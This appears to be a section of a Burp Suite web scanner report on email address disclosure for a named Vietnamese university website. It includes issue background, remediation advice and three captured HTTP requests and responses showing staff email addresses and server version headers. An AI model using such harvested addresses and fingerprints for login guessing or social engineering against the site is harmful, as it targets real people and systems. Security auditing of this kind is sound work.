The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

Consider removing any email addresses that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
To reduce the quantity of spam sent to anonymous mailbox addresses, consider hiding the email address and instead providing a form that generates the email server-side, protected by a CAPTCHA if necessary.

Vulnerability classifications

Request 1

GET /topic/?11387= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=vajug7ptns97blqrojb6jrfdi1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:42:40 GMT
Connection: close
Content-Length: 16489

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
</strong>: daihoctg@tgu.edu.vn</p>
...[SNIP]...
<p class="cus-font cus-font-size-foot">
Mọi thông tin liên quan đến website, xin vui lòng liên hệ theo địa chỉ Email: webmaster@tgu.edu.vn<br />
...[SNIP]...

Request 2

GET /dept/?7= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=6dq9h8q8fb17m85h8r0csi7ci1

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:41:38 GMT
Connection: close
Content-Length: 30010

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<br />
           Email: ptaivu@tgu.edu.vn</p>
...[SNIP]...

Request 3

GET /dept/?25= HTTP/1.1
Host: www.tgu.edu.vn
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.tgu.edu.vn/
Cookie: PHPSESSID=hhqrdc61tssv52p18nn7n6t6f7

Response 3

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.0
X-Powered-By: PHP/5.6.31
X-Powered-By: ASP.NET
Date: Thu, 04 Oct 2018 13:41:52 GMT
Connection: close
Content-Length: 23801

<!DOCTYPE html>
<html lang="en">
   <head>
   <meta http-equiv="content-type" content="text/html" charset="utf-8"/>
   <!-- Always force latest IE rendering engine (even in intranet) & Chrome Frame
   Re
...[SNIP]...
<br />
           Email: ttthnn@tgu.edu.vn</p>
...[SNIP]...

Report generated by Burp Suite web vulnerability scanner v2.0beta, at Thu Oct 04 22:17:26 ICT 2018.